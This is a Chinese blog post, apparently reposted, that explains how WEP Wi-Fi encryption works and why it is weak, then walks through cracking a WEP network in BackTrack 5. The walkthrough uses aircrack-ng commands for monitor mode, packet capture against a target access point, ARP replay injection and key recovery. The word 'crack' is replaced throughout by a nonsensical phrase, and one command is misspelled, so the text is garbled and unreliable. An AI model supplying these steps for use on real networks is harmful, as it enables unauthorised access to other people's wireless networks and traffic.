WIFI激活成功教程原理(WEP)

WIFI激活成功教程原理(WEP)一 WEP 原理 WEP WiredEquival 叫做有线等效加密 是一种可选的链路层安全机制 用来提供访问控制 数据加密和安全性检验等功能 是无线领域第一个安全协议 WEP 认证方式可以分为 Opensystem 和 Sharedkey 1 采用 Opensystemau 方式 此时 WEP 密钥只做加密 即使密钥配的不一致 用户也是可以

一、WEP原理

WEPWired Equivalent Privacy)叫做有线等效加密,是一种可选的链路层安全机制,用来提供访问控制、数据加密和安全性检验等功能,是无线领域第一个安全协议。



WEP认证方式可以分为:Open systemSharedkey

1.采用Opensystemauthentication方式:此时WEP密钥只做加密,即使密钥配的不一致,用户也是可以上线,但上线后传输的数据会因为密钥不一致被接收端丢弃。

2.采用Sharedkey authentication方式:此时如果双方密钥不一致,客户端就不能通过Shared key认证,无法上线。

加密过程如下:

1、先产生一个IV,将其同密钥串接(IV在前)作为WEPSeed,采用RC4算法生成和待加密数据等长(长度为MPDU长度加上ICV的长度)的密钥序列;

2、计算待加密的MPDU数据校验值ICV,将其串接在MPDU之后;

3、将上述两步的结果按位异或生成加密数据;

4、加密数据前面有四个字节,存放IV和KeyIDIV占前三个字节,KeyID在第四字节的高两位,其余的位置0;如果使用Key-mappingKey,则KeyID0,如果使用DefaultKey,则KeyID为密钥索引(0-3其中之一)。加密后的输出如下图所示,解密过程则相反。

二、WEP的安全性问题

1、WEP协议的在数据传输时,用于生成密钥流的初始向量IV是明文的方式。而该向量只有24位,这就使得在2^24个数据包后至少出现一次重复IV值,并且在实际中IV值重复的概率远远大于1/2^24;根据生日悖论,则五秒钟后相同IV值出现的概率就大于0.5

2、数据包的第一个加密字节为RC4算法产生的第一个字节和LLC头的第一个字节(0xaa)加密(做异或操作)的结果。攻击者利用猜的第一个明文字节和WEP帧数据负载密文进行异或运算就可得到PRNG生成的密钥流中的第一字节。

3、假设我们知道发生初始向量碰撞的两段密文值C1C2,由于明文是有统计规律的语言,结合字典攻击,就能够以极大概率猜测到明文P1P2的值,并可以使用明文的CRC校验值来判断得到的猜测值是否正确。

4、WEPCRC校验算法也存在攻击缺陷,CRC检验和是有效数据的线性函数(针对异或操作而言,即C(x+y)=C(x) +C(y)),利用这个性质,攻击者可篡改密文,从而导致数据的完整性更改

5、 密码流RC4IVk)可能被重复使用,而不会引起任何怀疑,借以构造这样的消息,就可以向无线局域网注入任意的信息流,如认证信息注入攻击。

三、激活成功教程软件

1、WINDOWS系统软件

WinAirCrack

WINDOWS下的激活成功教程软件,更新很慢,支持的网卡型号少,不推荐使用,具体的激活成功教程步骤可以参考网上相关WINDOWS下激活成功教程的相关文章。

2、Linux系统软件

很大黑客工具都在Linux系统下有很好支持,激活成功教程无线网络的Linux系统有BackTrackwifiwayLinux LIVE CD

BackTrack是基于SlackwareSLAX的自启动运行光盘,它包含了一套安全及计算机取证工具。它其实是依靠融合Auditor Security LinuxWHAX(先前的Whoppix)而创建成的。其中包含AirCrack等无线网络激活成功教程工具,当然无线网络激活成功教程只是这个CD的一小部份功能。现在最新版本为BT5 R2。

三、激活成功教程步骤

基于以上安全性问题,我且演示在BT5环境下用aircrack系列工具进行激活成功教程。

1、激活无线网卡

ifconfig wlan0 up

WIFI激活成功教程原理(WEP)

2、启动混杂模式

airomon-ng start wlan0

WIFI激活成功教程原理(WEP)

3、抓取数据包

airodump-ng -w “filename” –bssid “AP Mac地址” mon0

WIFI激活成功教程原理(WEP)

WIFI激活成功教程原理(WEP)

注意:“ ”不用输入

4、arp注入攻击

aireplay-ng -3 -b “AP Mac地址” -h “wifi Mac地址” -x 1000 mon0

WIFI激活成功教程原理(WEP)

5、密码激活成功教程

aircrack-ng -x -f 2 “第3步住区的数据包文件名”

注意:文件名为 .cap后缀

WIFI激活成功教程原理(WEP)

WIFI激活成功教程原理(WEP)


版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/232120.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号